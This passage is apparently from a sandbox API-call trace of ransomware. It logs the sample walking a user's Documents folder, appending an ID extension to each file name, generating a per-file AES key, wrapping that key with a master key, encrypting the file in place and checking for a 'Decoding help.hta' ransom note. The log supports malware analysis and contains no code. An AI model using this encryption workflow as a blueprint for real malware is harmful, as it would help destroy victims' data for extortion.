CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.769] SetFilePointerEx (in: hFile=0x260, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.769] WriteFile (in: hFile=0x260, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.770] WriteFile (in: hFile=0x260, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.770] CloseHandle (hObject=0x260) returned 1 [0043.771] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.771] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad4c7b0, ftCreationTime.dwHighDateTime=0x1d4b75c, ftLastAccessTime.dwLowDateTime=0xb2d9be50, ftLastAccessTime.dwHighDateTime=0x1d5137a, ftLastWriteTime.dwLowDateTime=0xb2d9be50, ftLastWriteTime.dwHighDateTime=0x1d5137a, nFileSizeHigh=0x0, nFileSizeLow=0x12b46, dwReserved0=0x0, dwReserved1=0x0, cFileName="cH9GNVMjD8ZOg2ghJZgJ.xlsx", cAlternateFileName="CH9GNV~1.XLS")) returned 1 [0043.771] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.771] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0043.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0043.771] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cH9GNVMjD8ZOg2ghJZgJ.xlsx") returned 1 [0043.771] lstrlenW (lpString="cH9GNVMjD8ZOg2ghJZgJ.xlsx") returned 25 [0043.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.771] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="cH9GNVMjD8ZOg2ghJZgJ.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx" [0043.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx" [0043.772] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx.[ID]g9uZrLhJaygpwRm1[ID]" [0043.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ch9gnvmjd8zog2ghjzgj.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ch9gnvmjd8zog2ghjzgj.xlsx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ch9gnvmjd8zog2ghjzgj.xlsx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0043.772] CreateFileMappingA (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x320 [0043.772] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x34491c0) returned 1 [0043.773] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5a59f0) returned 1 [0043.773] CryptExportKey (in: hKey=0x5a59f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0043.773] MapViewOfFile (hFileMappingObject=0x320, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12b40) returned 0x49a0000 [0043.775] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0043.775] CryptEncrypt (in: hKey=0x5a59f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x49a0000, pdwDataLen=0x580fce4*=0x12b40, dwBufLen=0x12b40 | out: pbData=0x49a0000*, pdwDataLen=0x580fce4*=0x12b40) returned 1 [0043.776] UnmapViewOfFile (lpBaseAddress=0x49a0000) returned 1 [0043.778] CloseHandle (hObject=0x320) returned 1 [0043.778] CryptDestroyKey (hKey=0x5a59f0) returned 1 [0043.778] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.778] SetFilePointerEx (in: hFile=0x260, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.778] WriteFile (in: hFile=0x260, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.779] WriteFile (in: hFile=0x260, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.779] CloseHandle (hObject=0x260) returned 1 [0043.781] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cH9GNVMjD8ZOg2ghJZgJ.xlsx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.781] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee0ba700, ftCreationTime.dwHighDateTime=0x1d499ad, ftLastAccessTime.dwLowDateTime=0x43f78750, ftLastAccessTime.dwHighDateTime=0x1d4e9cd, ftLastWriteTime.dwLowDateTime=0x43f78750, ftLastWriteTime.dwHighDateTime=0x1d4e9cd, nFileSizeHigh=0x0, nFileSizeLow=0x41de, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRK9 Rh7.xlsx", cAlternateFileName="CRK9RH~1.XLS")) returned 1 [0043.781] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0043.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0043.781] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CRK9 Rh7.xlsx") returned 1 [0043.781] lstrlenW (lpString="CRK9 Rh7.xlsx") returned 13 [0043.781] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="CRK9 Rh7.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx" [0043.781] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx" [0043.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx.[ID]g9uZrLhJaygpwRm1[ID]" [0043.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\crk9 rh7.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\crk9 rh7.xlsx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\crk9 rh7.xlsx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0043.782] CreateFileMappingA (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x320 [0043.782] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x34491c0) returned 1 [0043.783] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5a56f0) returned 1 [0043.783] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0043.783] MapViewOfFile (hFileMappingObject=0x320, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41c0) returned 0x4410000 [0043.785] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0043.785] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x580fce4*=0x41c0, dwBufLen=0x41c0 | out: pbData=0x4410000*, pdwDataLen=0x580fce4*=0x41c0) returned 1 [0043.785] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.787] CloseHandle (hObject=0x320) returned 1 [0043.787] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0043.787] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.787] SetFilePointerEx (in: hFile=0x260, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.787] WriteFile (in: hFile=0x260, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.788] WriteFile (in: hFile=0x260, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.788] CloseHandle (hObject=0x260) returned 1 [0043.788] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CRK9 Rh7.xlsx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.789] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1de59710, ftCreationTime.dwHighDateTime=0x1d4c686, ftLastAccessTime.dwLowDateTime=0x15ae4b10, ftLastAccessTime.dwHighDateTime=0x1d4d1ca, ftLastWriteTime.dwLowDateTime=0x15ae4b10, ftLastWriteTime.dwHighDateTime=0x1d4d1ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbfmOx0DNUNPSie", cAlternateFileName="DBFMOX~1")) returned 1 [0043.789] lstrcmpW (lpString1=".", lpString2="dbfmOx0DNUNPSie") returned -1 [0043.789] lstrcmpW (lpString1="..", lpString2="dbfmOx0DNUNPSie") returned -1 [0043.789] lstrcmpiW (lpString1="windows", lpString2="dbfmOx0DNUNPSie") returned 1 [0043.789] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="dbfmOx0DNUNPSie" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie" [0043.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dbfmOx0DNUNPSie\\*.*" [0043.789] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0043.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4268730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0043.985] CloseHandle (hObject=0x260) returned 1 [0043.985] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.179] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0046.179] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0046.179] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0046.179] lstrlenW (lpString="desktop.ini") returned 11 [0046.179] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" [0046.179] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" [0046.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0046.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x49c [0046.180] CreateFileMappingA (hFile=0x49c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x624 [0046.180] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x3448b60) returned 1 [0046.181] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x671b30) returned 1 [0046.181] CryptExportKey (in: hKey=0x671b30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0046.181] MapViewOfFile (hFileMappingObject=0x624, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x3240000 [0046.183] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0046.183] CryptEncrypt (in: hKey=0x671b30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x580fce4*=0x180, dwBufLen=0x180 | out: pbData=0x3240000*, pdwDataLen=0x580fce4*=0x180) returned 1 [0046.183] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0046.185] CloseHandle (hObject=0x624) returned 1 [0046.185] CryptDestroyKey (hKey=0x671b30) returned 1 [0046.185] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0046.185] SetFilePointerEx (in: hFile=0x49c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.185] WriteFile (in: hFile=0x49c, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.186] WriteFile (in: hFile=0x49c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.186] CloseHandle (hObject=0x49c) returned 1 [0046.186] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.186] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe12970, ftCreationTime.dwHighDateTime=0x1d4c730, ftLastAccessTime.dwLowDateTime=0x3a82d260, ftLastAccessTime.dwHighDateTime=0x1d4cb19, ftLastWriteTime.dwLowDateTime=0x3a82d260, ftLastWriteTime.dwHighDateTime=0x1d4cb19, nFileSizeHigh=0x0, nFileSizeLow=0x1793c, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE2sk29TIgjPvTzVKz.pptx", cAlternateFileName="IE2SK2~1.PPT")) returned 1 [0046.187] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0046.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0046.187] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IE2sk29TIgjPvTzVKz.pptx") returned -1 [0046.187] lstrlenW (lpString="IE2sk29TIgjPvTzVKz.pptx") returned 23 [0046.187] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="IE2sk29TIgjPvTzVKz.pptx" | 